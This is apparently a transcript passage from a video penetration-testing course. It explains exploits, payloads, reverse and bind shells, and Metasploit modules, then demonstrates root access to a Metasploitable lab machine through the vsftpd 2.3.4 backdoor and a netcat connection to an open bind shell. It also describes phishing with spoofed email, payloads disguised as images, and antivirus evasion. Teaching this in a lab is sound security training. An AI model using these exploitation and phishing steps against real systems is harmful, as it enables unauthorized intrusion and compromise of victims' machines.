we know which ports our target has open. We also know which softwares are running on those open ports and what operating system does our target have. Then we performed vulnerability analysis using different tools like Nessus and Nmap. One reminder that the best vulnerability analysis you can perform is you googling, since some tools might fail to find vulnerability. It might not be in their database, but if you find out a version of a software and you Google it, if that software is vulnerable, it will most likely come up in some page. Now it is time to get our hands dirty. In the next video, we're going to see how we can exploit our Metasploitable machine and gain access to it. And we will also be attacking some other machines as well. All of these previous steps led to this final moment: hacking the target. Take a break if you need, and once you are ready, I will see you in the next section. Hello again and welcome to the exploitation section of the course. It is time we learn how to gain access to our target. What we managed to do for now is, with the help of our Kali Linux machine, we managed to identify our target and find out a lot of information about it. Remember, once we were starting, we didn't know anything about it. But after, with the help of different tools such as Nmap, Nessus, WhatWeb and others, we managed to gather enough information about our target to be able to exploit it. We have discovered opened and closed ports. We also discovered services running on those ports, including their versions. We found out what operating system was our target running, and we have also tried finding vulnerabilities to see whether the target has some known issues or bugs. In other words, we performed information gathering, scanning, and vulnerability analysis. Right now, the next step is to use that information we have to gain access to our target. Here is how the process goes. Imagine this is our target, and these are the information that we gathered for it. It is running Windows 10. We found out it has an older version of Windows 10 that hasn't been updated lately. We found 3 open ports and 1 filtered port, and we know for sure that one of those open ports has a vulnerable software running on it, since we also performed vulnerability analysis. Once we found out this information, the next step is to extract useful information from this. So in this case, what we would find most interesting would be these 2 facts: an outdated Windows 10 operating system and a vulnerable software on port 1234. This is what we will use to attack the target. We would then exploit the target's vulnerability and gain access to it. But wait a second. What do I mean we would exploit the target? How do we do it exactly? And what does exploit target even mean? Well, exploiting the target, in other words, is using its vulnerability that we discovered to send something called payload. What a payload is a program that we deliver to the target after the exploit. Usually, this program is something that allows us to execute commands on target system and navigate through its files and folders. Now, I know what you're thinking. It is still a little unclear to you as to how this works exactly. Don't worry, in the next 2 videos we will explain in details what exactly happens once we exploit a vulnerability and what type of payloads exist and which ones we will use the most. For now, it is important to remember that payload is a program that we drop after exploiting a target. And in 99.9% of cases, this will be a program that allows us to execute commands on target system, or also known as a shell. The first step would be us exploiting the target and sending shell or payload with it. That payload will then be on target's machine and it will execute. Once it executes, what it essentially does is it tells the target machine connect to that other machine and allow it to execute commands on your system. And that other machine would be our Kali Linux. And the third step is pretty easy. We just send the commands that we want our target to execute. We navigate through files, run other programs, and in return, target sends us an output of the command that we executed. Picture it like using target's terminal from our Cal Linux machine. However, there is one problem with this. Imagine we have two different targets, target A and target B. And let's say target A has unknown vulnerability. It is running some outdated software on port 5555, for example, and in that case we would do what we just explained, which is exploit the target through the vulnerability and deliver the payload that will allow us to control that target machine. Well, this scenario would only work if the target has a vulnerability. But what if it doesn't have a vulnerability? What if all of its softwares are fully updated and secured? What then? In that case, we would do something similar. We would deliver the payload to the target, just this time we cannot do it through an exploit, which also means we can't make the payload auto-execute on the target, since once again there is no exploit that we can do. We must deliver the payload to target using different way, and also we must make it execute a different way. Well, in this case, social engineering comes in play. We would try to trick the user to open our payload by themselves. They must run it for us. How would we do that? Well, we could use different methods of delivering the payload. We could, for example, use an email containing our payload that we perhaps masked to look like an image or a different file type. We would also make sure that email looks legit and target doesn't think twice before trying to open that image. We could spoof our email address so it looks like someone that our target knows, so they would never think that the image we sent could contain something malicious. Once they open that image, in the background our payload executes, and it grants us access to their machine without them even knowing it. This is just an example. There are multiple ways that we can do this. If you were, for example, physically close to the target, you could infect it over USB drive. Plug the USB drive in the target machine and execute payload manually. But something like this you will almost never do, due to a higher risk of course, and if you were even able to come close to the target machine. Nonetheless, these are the two different possibilities. Either target is vulnerable, or it isn't. However, if it isn't, we don't just quit. We try different methods. Throughout this section, we will cover another big tool that all hackers use, and that tool is called Metasploit Framework. It contains thousands of exploits, and all of them are already in our Cal Linux machine. All we need to do is learn how to use them and how to run them. This is something we will cover shortly in great details. Let's start hacking. What exactly is a vulnerability? We talked about the process of gaining access and making target execute our commands, but let us explain what happens once we exploit a vulnerability. Well, let's start like this. And trust me, if it sounds a little complicated, it will be more clear once we get to practical examples in the next few videos. For now, let's explain it like this. We know that developers write programs. They use their code, which can be written in any language, whether it is Python, Java, C, or some other language. The goal for developer is to create software using a programming language. And as we mentioned, that software can be based on any language whatsoever. Once the software is complete and it goes through a few test checks and security checks, then that software gets deployed on machines and it can be ran from those machines. This can be any type of software, it doesn't matter. However, the problem occurs once that software is open to the internet. For example, FTP is open on some machines and servers for file transfer protocol. SSH could also be open for secure shell connection. HTTP could be open to host a web page that clients connect to. Basically, if your software is hosted on an open port, then it is also open for possible attacks from the outside. And as we already know that the software is consisted of code that developers wrote, problem occurs if that code is not well written, if it has some bugs. Now, it doesn't necessarily mean that if there is a bug that we can exploit the target, but sometimes those bugs can be critical, and the attacker could use that bug to make software act in a way that it is not intended to. That's called exploitable vulnerability. Usually once exploited, we drop a payload or a shell back, so we can control that machine and do what we want with it. Once a bug or vulnerability is discovered, it gets that name that we've seen for vulnerabilities in NASes that starts with CVE, and then the year of when the vulnerability first occurred. A vulnerability that exists and has not been patched yet by the vendors is called 0 day. Usually as soon as critical 0 day is discovered, it gets patched almost immediately, but you will see examples of 0 days that were used for months before anyone found out about them. The most known recent one was in 2017, when the WannaCry ransomware occurred and infected a bunch of hospitals and police stations. It was based on an exploit called Eternal Blue, which was created and used by NSA. They never reported it and used it for their attacks until those exploits got stolen from them and got leaked. We will see in this course a lot of recent 0 days that are now patched. Some of them will even be as recent as just a few months ago. However, all of this makes sense if the target has a vulnerability. But remember, vulnerabilities don't always have to be of technical nature. Imagine a company with a bunch of networks, servers and machines, fully secured and also protected by the best firewall. No security holes, no vulnerabilities. We can't even scan the target to figure out its infrastructure because its protection is so good. Now, imagine an employee that works there. Let's call him John. And let's focus on John at the moment. John likes cars. He usually searches for car pictures and videos while working. One day he gets an email from a person that has email name exactly the same as his colleague. In that email, there is a car picture. He sees that the email is coming from his colleague, so he doesn't question it. Therefore, he opens that picture at work, and it indeed is a car picture. But little does he know, that email was us spoofing an email for him, so that at the first glance it looks like it comes from his colleague, and that picture opened a car image, but it also ran our malicious program in the background. What happens next? Now, John's work computer is infected, and he doesn't even know it. And from his computer, we can compromise the entire network and the entire inside of that company. Now this is just an example, but stuff like this happens a lot. Matter of fact, most of the hacking that happens that you read about happens this way, and not by someone finding a 0 day vulnerability on a fully secured company. Remember, people are always the weakest spot. So if you can hack something through them, why would you bother trying to discover a technical vulnerability that might not even be there? In the next video, we're only left to talk briefly about shells and different types of shells that we want to drop once exploiting the target. After that, we are ready to get our hands dirty and start gaining access to our target machine. See you in the next video. Before we get into Metasploit Framework and its structure inside of our Kel Linux, let us first talk about reverse shells and bind shells. As we already mentioned, shell is our access to the target machine. With the help of shell, we execute commands and control the target system. So, shell is essentially our payload that we drop on machine after exploiting it. However, there are two different types of shells. We got reverse shells and bind shells. Now, reverse shells are something that you will use a lot. It works on principle of target machine trying to connect back to our Kel Linux machine. For this to work, on our Kel Linux machine, we must first listen for the incoming connection over some port. Then we exploit the target and drop a shell which will tell that target machine to connect to our port on Kel Linux that we're listening on. After it completes the connection, we can then control that machine. On the other hand, bind shell is when the target machine opens their port for us to connect to. In this case, it is the target machine that is listening for the incoming connection on that port. And we are the ones that must connect to that port. After we do it, we can control that target machine. However, there is one problem with bind shell. And it is also one of the main reasons why we won't use it that much. And that is because Firewall can forbid target machines to open a port. Many firewalls could have a rule that says don't open any random port for security reasons. Therefore, our bind shell would not work even after exploiting the target. However, reverse shells will always work. Why? Well, because the target in that case is just connecting to us. It is the same process as when the target visits a website. It connects to a port on that web server, and it gets the web page of that website back. Just in this case, it will connect to a port on our Cal Linux machine, and we will establish a shell like that. That's why reverse shell is always a better option if possible. Alright, cool. Now we are ready to start introducing ourselves to the Metasploit Framework, the number one tool that we will use for exploitation. It is as important as Nmap, and we will use it a lot, so it is important we get its basics down first. It is not hard, however, it will take some practice to get used to it. Let's get straight into it. Welcome back. Let us talk about Metasploit Framework. We already mentioned that we will use this tool a lot to exploit different targets and their vulnerabilities. But there are a few things we need to learn first about it before we get to use it. Remember when I told you that Metasploit Framework offers us thousands of exploits that we can use for Windows, macOS or Linux? While that is true, Metasploit offers us a whole lot more things that we can use besides the exploits. Matter of fact, exploits are just one of 7 modules that we can get with Metasploit. Besides them, we also get payloads, auxiliary modules, encoders, evasion modules, NOPs, and post-exploitation modules. If you are new to all of this, you probably have no idea what each of them are. Don't worry, we will explain it right now. First, to navigate to the Metasploit Framework directory, we can type cd/user/share and then Metasploit-framework. You can just type meta and then tab it to autocomplete it. If I press your enter, and if I type ls right here in the Metasploit Framework directory, we are going to see quite a few things. One of the most important things right here is this MSF console. And this is an executable file. This is our program. If we wanted to run Metasploit, we would just type MSF console in the terminal and it will open the Metasploit Framework. The MSF Venom is also very important. This is a tool that we will use to generate a payload or a shell that we use to control the target machine with. But for this video, what we want to explain is this modules directory. If we change to that directory, so cd modules, and I type ls here, we will see those 7 modules that I mentioned. Let's talk about each one of them a little bit. We're already familiar with exploits, right? Let's go to that directory first. So cd, exploits, and just to remind ourselves that an exploit module or program executes a sequence of commands to target a specific vulnerability in a system or application. It takes advantage of that vulnerability in order to provide us an access to that machine. There are a few different types of exploits, such as for example buffer overflow, code injection, web application exploits, but what's also important to mention right here regarding Metasploit is that once we type ls inside of this exploits directory, you will see these exploits are split into different groups. We got Windows exploits, OS X exploits, Linux exploits, Firefox exploits, and many others as well. And if we go to any of them, for example, let's go to Windows exploits, and I type ls right here, we will get even more division of exploits. All of the Windows exploits that we have are divided into a bunch of other submodules such as FTP, Firewall, SMTP, SMB, and others. And all of them contain exploits for those specific things. If we navigate to, for example, HTTP Windows exploits, so let's go there. And I clear the screen, type ls right here. We will see there is a lot of them for the HTTP. And this .rb that all of these files have is just an extension for Ruby language. All of the exploits in Metasploit Framework are coded inside of our Ruby language. And each one of these programs right here exploits a different vulnerability. If you were, for example, interested in how some of these work, you could open the code of an exploit using Nano Editor. Let's see, for example, this one. If I nano it, it will open the code of this exploit. And if you know Ruby language, you could figure out how this exploit works, right? It also gives us a description right here. So this exploits a stack buffer overflow in the web store HTTP server. The server and source code was released within an article from the Microsoft System Journal in February 1996, titled Write a Simple HTTP. So this is an old exploit. But you can do this for any file that you want. You can just open it and see the code of that specific exploit. And that's how they are stored in Kali Linux. Let's also mention other modules that exist besides these. So if I go back to the modules directory and type ls, let's next talk about the auxiliary modules. So if I change directory to auxiliary and I type ls right here, then we will see that auxiliary modules are also split into different categories, as we can see right here. And an auxiliary module does not execute a payload like an exploit module does. It is used to perform different actions such as scanning, fuzzing, or denial of service attacks. These modules can sometimes be used in first two stages of penetration test, as there is a lot of them that perform fingerprinting and vulnerability scanning. If we go to one of these submodules, for example, let's go to sniffer submodule. If I type cd sniffer, type ls, well, it seems that there is only one sniffer in Metasploit. And we can see again it is also coded in Ruby language, because of the .rb extension. If we go to a different auxiliary submodule, for example, let's go to this one, which is spoofing, so let's go to the spoofers, clear the screen, type ls, we can see they're also divided into even more submodules based on what it is spoofing. So it can spoof ARP requests, it can spoof DNS, it can spoof MDNS, and others as well. And all of these spoofers we can use for our attacks if we need to. Good, those are the auxiliary modules. Now, you can always explore others as well if you want to check out what different files this module has. But we're going to continue and we're going to cover the next module from the Metasploit Framework, which is the post-exploitation module. And if I change directory to the post-exploitation module, clear the screen and type ls, this module is used, as its name says, after exploiting the target. Usually, they're used to gather or steal information from target's device. That information could be files, saved passwords, dumping hashes, enumerating other services and applications of the target, and many other things we can do with post-exploitation modules. After you type ls, you will see that they are mostly split the same as the exploits. If we go to Windows post-exploitation modules and type ls right here, we will see different post-exploitation submodules that have different purposes, such as gathering information, such as escalating privileges. And these escalating privileges simply means if we exploit the target as a regular user on that machine, we would always want to try to escalate our privilege to become an administrator or a root account. We can also see Vlan post-exploitation modules, and I believe this would be used to steal saved wireless passwords to the access points that the target was connected to. Okay, you can explore the others as well if you want to, and let's talk about the others as well, so we can go through all of them real fast, so you can get a pretty good understanding of what all of these modules do. And the next one that we will talk about is also really important, and that is payloads. If I change directory to payloads, clear the screen, and type ls, and hopefully you remember that payload is something we deliver to the target with an exploit in order to control that machine. And in this payloads directory, we can see it is split in 3 different subdirectories: singles, stagers, and stages. What does this even mean? Well, singles are payloads that are completely standalone. A single payload can be something as simple as adding a user to the target system or running some other application. Stagers set up a network connection between the attacker and victim and are designed to be small and reliable. And lastly, stages are payload components that are downloaded by stagers modules. These payload stages can provide us with advanced features with no size limits, such as, for example, different command shells or Meterpreter shells. And Meterpreter is something that we mentioned for the first time. Meterpreter shell is also something that we will use a lot. It is similar to the command shell, but with a bunch of other options as well besides executing commands. We can download files, upload files, record microphone conversation, run webcams on target machine, take screenshots of their desktop, and many other things we can do with the Meterpreter. So once we are exploiting a target, Meterpreter is usually what we want to run on that target after an exploit. If I go to stagers directory right here to see these stagers, clear the screen, type ls, and if I, for example, go to Windows stagers, type ls, here we can see different ways of establishing connection. Remember when we talked about 2 different types of shells in the last video? Well, here they are. Here we can establish a connection either by binding to a port or by listening and creating a reverse shell connection. They are further divided into, for example, reverse HTTP, reverse UDP, and reverse TCP. And out of all of these that we have right here, we will almost always use reverse TCP. So for now we know that 2 main things we will combine in a payload is reverse TCP connection and a Meterpreter shell, because that 2 combined give us much more options to do with the target. Okay, great. Now, if you don't understand some of this, don't worry once again. This is something that you will fully understand once we get into the practical examples. For now, we are left to explain 3 more modules, and we're going to go quickly through them, since they are less important than the ones that we already covered. And those are the Evasion modules, Encoders, and NOPs. Now, let's go with Encoders first. Encoders are something that helps us to evade antivirus detection. How exactly? Well, even though we call our payload a shell or a Meterpreter, what it is to antiviruses and other people, it is just a simple malware or Trojan or a virus. That's why, with the help of encoders, we can encode our payload and make it less detectable by some antivirus vendors. These are not that useful anymore since they are known to almost all antiviruses. They can, however, help us bypass some of them. And Evasion modules do pretty much the same thing. And if I change directory to them, so see the Evasion, you will see that there are Evasion modules only for Windows. And they are used to bypass Windows Defender. If I change my directory right here, type ls, we will see different Windows Defender files that we use in order to bypass the Windows Defender. However, since Windows Defender recently got an update, I believe many of these don't work anymore. But don't worry, we will see later in the course different techniques that we can use to bypass antiviruses and execute our payload. And the last thing that we got are NOPs. NOPs can be a little bit hard to understand. What a NOP is an instruction for the processor to do nothing. Once a processor reads a NOP instruction, it does absolutely nothing. And I know what you're thinking, what is the purpose of this for us? Well, these NOPs are useful in buffer overflows to allocate a lot of space in memory before the payload executes. By the way, NOP stands for No Operations, and if you ever programmed in assembly before, you will be familiar with these. But don't worry, for now, NOPs are not that important for us. Okay, that was a lot to take for one single video. But all of this will be more clear once we start exploiting our target, and trust me, we're really close to that. we just need to explain the usage of Metasploit in the next video real quick, and after it, we will perform our first exploits. So get ready and I will see you in the next video. Welcome back. In the previous video, we talked about Metasploit Framework structure. We explained all of the modules and what they are for, but we haven't really ran the framework itself. In this video, we're going to run it and cover some of the basic commands for it. Okay, I already mentioned in the last video that to open this framework, what we must do is open our terminal and type msf console. Press enter, and keep in mind that it might take some time to open, especially if you're running it for the first time. And here it is, it already opened for me, and what we get right here is we get the banner of Metasploit Framework, which changes every time you start this program, and down here we get these 7 modules that we talked about. And we also get the exact number of modules that we have available to us. So here we can see 2043 exploits, 1105 auxiliary modules, 344 post-exploitation modules, over 500 payloads, and a little bit of encoders, NOPs, and evasion modules. As in every other tool that we covered, to see all the available commands we can use, we can run the help command. This will open the help menu, which will give us all the available options, as well as some of the examples of how we can use Metasploit. But for now, this is not necessary, as I will show you a few of these commands that you will use every time. And by the way, before we get into those commands, what you can do inside of the Metasploit framework, you can also run the normal commands, such as ls, such as changing directories, such as, for example, running ifconfig. So if I type sudo ifconfig and type in my password, it will give me the output of ifconfig. So you can also run regular terminal commands from this. But as far as the Metasploit framework goes, let's start with listing some of the modules. For example, we can use the show command to list out any type of modules we want. So we know that there are over 500 payloads. We saw the number once we started the Metasploit. In order to list all of those 500 payloads, we can type show and then payloads. If I press enter, it will take just a few seconds and it will list out all of the available payloads that we have. Now right here, this is not really that good of an output because I have my terminal a little bit more zoomed in than I should have, so I will just go to the preferences and lower the font of my letters. So I'll click on OK, apply, OK, clear the screen, and I will type show payloads once again. It's still not that good. Let me just go and lower it a little bit more, so I will just go to 13, apply, and click on OK. Clear the screen, run the command again, and here it is, we get a better output. So let's explain what we see right here. If I scroll all the way up to the beginning, we can see this is the number of the payload. It goes from 0 to over 500, and this right here is the name of the payload. So as we already know, there are bind shells and reverse shells. So we get different types of them. We can see the payloads for Android, the payloads for Apple iOS. We can see all types of payloads, command shells. We can see Java payloads, Linux payloads, if I go all the way down, OS X payloads, PHP payloads, Python, Ruby, and a bunch of others as well. Here's also Windows payloads. So we get a lot of them. Under the rank, they're all manual because they have to get executed on the target machine. And in the description, we can see for what this payload is. For example, if we check out this one, Apple Meterpreter Reverse HTTP, this is the Apple iOS Meterpreter shell or Reverse HTTP inline. So this means you would use this payload if you were, for example, attacking an Apple device. Now, we can do the same thing with exploits. If we want to list all of the 2000 exploits, we can type show exploits. And this might take a little bit longer because there is a lot more exploits than there is payloads. And here they are. Here are all 2041 exploits. You can see the output is pretty much the same as with the payloads. We get the number right here, we get the exploit name, and these exploit names are really well written. As we can see, the first part tells us for what is this exploit. Currently we are inside the Windows exploits. And if we scroll all the way up, we should see some other exploits as well. Let's go and scroll all the way up. Well, it seems that we can only go up to here because there is a lot of them. But nonetheless, we can see for what the exploits are. For example, this one is for Windows and for browser. And here it specifies exactly what does it exploit. If I go down here and, for example, check out these ones, here we can see this is also Windows exploit for the FTP. So they're very well organized, and this is the structure that we saw in the previous video. Just this is how the Metasploit framework outputs it for us. These exploits that belong to Windows FTP are all located inside the FTP directory of the Windows exploits directory. If I go all the way down, and what we can do right here is we can choose one of these exploits, just to see how we can select them and run them. Of course, we're not going to be attacking any target, we just want to see how we can select one of these exploits. So let's go with this one. For example, Windows SMB MS06 040 Net API. And by the way, to check out more information about exploits, we can go on to the right. So this exploit came out in 2006, and in the right column right here, it tells us what exactly does this exploit do. So for this particular one, we get that it is an exploit for Microsoft Server Service, and it overflows this function. Now, the good part about this is that you don't really need to know how these work in order to be able to run them. Let me show you. If you copy this exploit name right here, so copy Windows SMB MS06 040 Net API, in order to select it, let us clear the screen, we can type the command use. And you type use and then the module name that you want to use. In our case, we want to use an exploit. And after it, all we have to do is paste the exploit name. So use exploit /windows /smb / and then the name of the exploit. Press enter, and we will see that this exploit configured payload Windows Interpreter reverse TCP. And we will talk about this in just a second. For now, we can see that it is currently using the module that we selected, because it is printed out in red right here, and it also tells us that it is an exploit. So let's check out all the information that we can get for this exploit. The first thing that I always like to do is type the command show info. And this show info command tells us more about this particular exploit. So if we go down here to the description, it will tell us this module exploits a stack buffer overflow. So this is a buffer overflow exploit in the Net API 32 canonicalize path name function using this RPC. And you can read about any exploit that you select. Another information that we get right here are some of the references, so you can visit these links right here to read more about this particular exploit. Besides this, another command that we can do is show options. And this is the important part. Let me just clear the screen and type it once again just so we can see only the options part. Here is where you select your options for the exploit. First thing we see is module options, and it asks us for 3 different things. And keep in mind, different exploits will want different things. Usually they will all have these rhosts and rport, which is just the remote host and the remote port, or in our case, the target's IP address and the target's port that we're attacking. So we can see 2 of these are already automatically set. The R port is already set to be 445, and the SMB pipe is already set to be the browser. All we are left to specify right here is the R hosts, or the IP address of the target machine. So if we were attacking a Windows server that was vulnerable to this attack, we would specify here the IP address of that Windows server machine. And in this column right here, you will notice that some of these things will be required and some of these things will not be required. In our case, in this particular exploit, all of these 3 things are required to specify in order for exploit to work. In the description, it tells us exactly what it wants from us, so the rhosts is the target host, or the target IP address. The rport is the SMB service port on the target machine, and the SMB pipe is the pipe name to use. So these are the exploit options. And down here we get payload options. Now what does this mean? Well, remember, after exploiting the target, we drop a payload. So by default, remember once we ran the command to use this exploit, it gave us Windows Meterpreter reverse TCP by default. This means that we're using a payload for Windows. It is a Meterpreter shell, which remembers it is the best shell that we can get, and it is a reverse shell over TCP connection. You can change this if you want to, and down here we get the options that we need to set for payload. Remember, once using reverse shell, we must listen on our Cal Linux machine for the incoming connection. And that's the information that it asks us right here. The L host is our own IP address, the IP address of Cal Linux machine, or as it says right here, the listening address. We specify our IP address right here, so you just need to type sudo ifconfig, and we can see 192.168.1.9. Usually the Metasploit Framework will set it by default. So let me just clear the screen, run show options once again, and the L port is the listening port, or Cal Linux port that we want to listen for the incoming connections, and it is usually set by default to be 4444. And all of these options you can change. For example, if you notice that Metasploit Framework set the incorrect IP address for a Cal Linux machine, you can type set and then the parameter name, in our case lhost, to be a different IP address. For example, 192.168.1.15. And it will set the lhost parameter to be a different IP address, as we can see right here. Inside of these rhosts, as we can see this is also required, we would set the IP address of our target machine. So let's say we had a Windows server and its IP address was 192.168.1.20. We would type it right here, so 192.168.1.20. And if we type show options once again, now we got this set as well. Now, payload is something that you can change. Usually you want to leave it what Metasploit Framework already gave you, because the default one is usually the best one, but sometimes some of the payloads will not work, and others will work. So in order to see all of the available payloads that you can use for this particular exploit, you can type show payloads once again. Just this time it will not list out all the 500 possible payloads, it will only list out the possible payloads for this particular exploit. And this will be all the Windows payloads. Since we are attacking a Windows machine with this exploit, the Windows payloads will be something that we can use. So we can see some bind shells, reverse shells, we can see some of the Meterpreter shells. So for example, let us say that you don't want to use a reverse shell, you want to use a bind shell. How would you change the payload? Well, you would copy the bind shell. Let's say we want to use the Meterpreter bind shell, so copy its name, and go all the way down and type set payload, and then paste the payload name. So paste selection, press enter, and it will tell us the payload has been changed. If we clear the screen, show options, we will see different payload. We no longer have the Meterpreter reverse TCP, we now have the bind TCP Meterpreter. And it will also ask us for different information about the payload. We no longer get the lhost, since remember with bind TCP it is not our Cal Linux machine that is listening for the connection, it is the target machine that is listening for the connection, and we are the ones that connect to it. So in this case it is asking us for our host, or the remote host, or as the description says, the target IP address. So we would select right here the same IP address that we select right here, because it is the target that has to open the port, and the local port will be the local port on the target machine that will open for us to connect to. And you would select here whatever you want. So what is important to get out all of this is that we can change different options using set command. So you just type set, and then for example we want to change the L port, we type L port and then make it whatever we want. and if we type show options, it will be changed right here. And the last part that we see down here are the targets. And these targets right here are all of the vulnerable targets for this particular exploit. To list all of them out, we can type show and then targets. This will give us a list of all the targets that we can exploit using this attack. So we get Windows NT, Windows XP, and now different versions of Windows XP, and Windows 2003. So this is an older exploit that attacks Windows XP machines. Now you can either, if you know exactly which version of Windows is the target running, you can select it right here by specifying set target and then the number. For example, let's say target is using Windows XP SP1 English. You could type it like this, so set target 3, because the ID for that particular version is 3. Or if you didn't know exactly which version, you would just leave it on automatic, which means that Metasploit Framework will figure it out on its own, so we don't need to specify it. The only important thing is that it is one of these versions. If it is, for example, a Windows 7 machine, this exploit will not work. And once you set all of these options, the last thing you need to do is type exploit. In our case, this will not work because we don't really have a vulnerable Windows XP machine, so it will give us an exploit failed error. In this case it is unreachable because this IP address right here on my local network is not even online. That's why this will not work. And this is pretty much it. Now, there are other commands as well that could be useful, but these are the main ones that we always use to choose exploits and payloads and to set their options. Finally, the time has come. In the next video, we're going to apply what we learned for now to perform our first exploit on the Metasploitable machine. See you in the next video. Hello and welcome back. Are you ready to hack your first target? Everything we learned up to here was building up to this moment. We're going to use all of our previous knowledge that we got to hack our target. Of course, this is just one of the many exploits that we will cover in this course, but it is important because it is our first one. In this case, we're of course going to be attacking the Metasploitable for our first exploit, so make sure you start it up, check out the IP address of Metasploitable, and in my case it is 192.168.1.5. And what I'm going to do is I'm going to open two terminals. In the first one, I will start my MSF console, and in the second one, I will perform the nmap scan for the version of the service. So we already know the command, sudo nmap-sv, and then the IP address of my Metasploitable. It will ask me for the password, I will input it right here, and it will start the scan. And you can open your Metasploit Framework once the scan is running, and once you open it, just wait for the scan to finish. Okay, so here it is. This is an output that we're already familiar with. Let's see whether we can exploit the target, and we're going to start in order. Let's go with the Ftp port first. So we notice right here which version of service is it running. In this case, VS FTPD 2.3.4. And also keep in mind that there is really no plan once you do something like this. We only know that the goal for us is to find an exploit if this software is vulnerable. Now, even though we know that best search would be us going on internet and typing VS FTP vulnerability, but I myself like to run the search exploit tool first, just to see whether we already have it right here on the machine. So I will open another terminal and I will copy the name of the version, in this case VS FTPD 2.3.4, copy it, and type search exploit and then paste the version name. If I press enter right here, we get one result. We get VSFTPD backdoor command execution. And in the right column, as you remember, we get the path to this exploit. There is one thing that we should notice right here. This is .rb. What does this mean? Well, this most likely means that this exploit belongs to Metasploit Framework. And it also tells us that right here in the brackets. So it means that we will have it right here, under one of these 2000 exploits. So how we can find it? Of course, we are not going to be listing all the 2000 exploits and trying to find the correct one. What we can do is we can type search and then the software name, so VS FTPD. And here it is, exploit, Unix, for the FTP, and it is the VS FTPD 2.3.4 version backdoor. It came out in 2011. It is ranked excellent, which means this exploit works, and here is the description for it. Let's read more about it, but first we need to select it. So to do that, we can type use exploit Unix FTP and then the name of the exploit. Press enter, and we can see the payload is default configured to CMD Unix Interact. But we're going to check this out in just a second. Let us first clear the screen and type the command show info. We want to read more about this exploit. So it will tell us in the description, this module exploits a malicious backdoor that was added to the VS FTPD download archive. This backdoor was introduced in the zip file archive between June 30th, 2011 and July 1st, 2011, according to the most recent information available. This backdoor was removed on July 3rd, 2011.
Are you scared?
Interesting. Let's see whether we got the vulnerable version. So if I clear the screen and type the next command, which is show options, we will see right here what are the things that we need to set up in order for this to work. So in this case, we only got two things. We got the R hosts and we got the R port. And this is the remote host, which is the IP address of our target, and the R port is the port number where the FTP is running on the target machine. If we go to my scan, we will see the port is set correctly, which is port 21. So this is something that we will not change. However, we need to set our remote host IP address. So let's set the IP address of Metasploitable, set our hosts 192.168.1.5 in my case. The payload is set by default, and if I type show payloads to see all of the available payloads that we have, for this particular attack we only get this single payload. So there is nothing really to change right here. We're going to use that one. And we can see it doesn't require any additional options whatsoever. So the easier for us, the better. Under the description we can see it is a Unix command. We simply just interact with established connection. So I expect that with this we're going to be able to execute commands on target machine if we manage to exploit it. Under the targets we can type show targets to see the available ones, and we got none because this is an actual exploit for the software, so in order to be able to exploit the target has to be running this software version, which in our case it is running. So everything is set, let us double check, type show options, we got the IP address of the target, we got the port number where the software is running on the target machine, and all we need to type to execute this is type exploit. Press enter. And here it is. We got the command shell session 1 opened on the target system. How do I know this? Well, it doesn't give us any output right here, but if I type, for example, ls, you will see we are getting an output. And this ls didn't execute on our Cal Linux machine. It executed on the Metasploitable. We are on that machine right now. We successfully exploited it. We can run any commands that we want, so if I type who am I, it will tell us that we are the root account. So not only did we manage to hack that machine, we also are root privileged account, so we can do anything we want on it. If I type pwd to check my current directory, I'm in the / directory, and if I type ifconfig, just to prove to you that we're on the target machine, we can see the output is 192.168.1.5. So that is the IP address of Metasploitable, as you can see right here. Inside of the / directory that we're currently at, we can create files right now. Let's go to the Metasploitable just to show you, and if I type ls in the / directory, these are the current files inside of this directory. If I type now mkdir and then test, and I type ls once again, now you will see that we successfully created the test directory on the Metasploitable machine. And if we check it on the machine itself, here it is. here is the test directory that we just created. So we successfully hacked the target. Now, the reason we are getting an output like this is because this is not really that good of a shell. This is not a Meterpreter shell, so that we get a well-organized output. But nonetheless, it is a shell indeed. We can execute the commands and we get the output of those commands back. And not only that, but we are a root account on the target system. Now, to exit the shell, we can just type exit. And it will tell us right here, command shell session 1 closed. And it was that easy. We gained root privilege account on the Metasploitable machine, and we could have done anything on it. This is as good as it can get. And this is exactly what we are looking for once we try to exploit a target. Now, sometimes it is this easy, but sometimes it isn't. And we will see some complicated exploits later on, and it will be even more complicated to exploit a target if it doesn't have any vulnerability. But for now, we are happy. We managed to hack our first target. But this is just one of the vulnerabilities. Let's keep exploring and see in the next few videos if the Metasploitable has some other vulnerabilities as well. And then after we finish with Metasploitable, we're going to move on to some other harder targets. Welcome back. In this video, we're going to cover and talk about misconfigurations. And also, in this very video, we will cover the easiest possible vulnerability that you could ever find. You might have already noticed it while we scan Metasploitable, and if you didn't, I will give you a chance to find it right now. So what I did right here is I performed a version scan on the Metasploitable virtual machine. You can do the same, or you can just take a look at the results right here. And do you by any chance see something that sticks out right here? Something that shouldn't be here. Now, you should be able to figure it out based on what we learned for now. So I will just give you a few seconds. And time has come. Have you managed to find it? It is this bind shell right here. And under the version it says Metasploitable root shell. I mean, just by its name we can see that something doesn't seem right. We know what bind shell is, right? So if this service doesn't have any type of authentication, we can just try to connect to this port that hosts this bind shell, in case port 1524 over TCP, and we will be given a root shell on that machine. Can't be that easy, right? Well, it is, and I wouldn't even consider this an exploit. This is just an example of what a misconfiguration could look like. Now, this would be a critical misconfiguration that would almost never happen. But sometimes even stuff like this can happen. Maybe an administrator set up something like this so he can access that machine from his home or from somewhere else, but he forgot to put authentication on it. You never know. Okay, so how can we establish connection to this port? Well, we won't be using Metasploit Framework for this particular thing. Instead, we're going to use a tool called Netcat. And Netcat is a program that allows us to establish network connections with other machines using both TCP and UDP. To run the Netcat help menu, we can type nc-h, which stands for help. And here we can see menu isn't that big at all. It only has a few options right here. And at the beginning of the menu, we also got these two main options. We can either connect to somewhere, or we can listen for the inbound or incoming connections. Since our Metasploitable target machine has a bind shell, that means we must connect to somewhere. And the syntax is just nc, then the hostname or the IP address, and then the port. Let's try it out. If I go down here and type nc, and then the IP address on my Metasploitable, I go and check out over which port is the bind shell being hosted. It is over port 1524. And I will type space and then the port. Or let me just clear the screen first and type nc 192.168.1.5 and then space 1524. Press enter, and it worked. We are again a root account on the Metasploitable machine. And as in the previous video, we can do anything we want. So if we type who am I, we can see we are the root account. ls tells us what directories we have. And remember the test directory from the previous video? Here it is. ifconfig will give us the IP address of the Metasploitable machine. So everything works as in the previous video. We are root account and we can execute the commands on the target system. Now, don't get used to this type of exploitation. Matter of fact, I won't even consider this an exploitation because the vulnerability wasn't in software, but in a person who would set something like this up without ever authenticating. Stuff like this rarely happens, but I wanted to show you this just to see whether you will notice it in our scan. In the next video, we're going to check out another quick vulnerability that is based on information disclosure. After 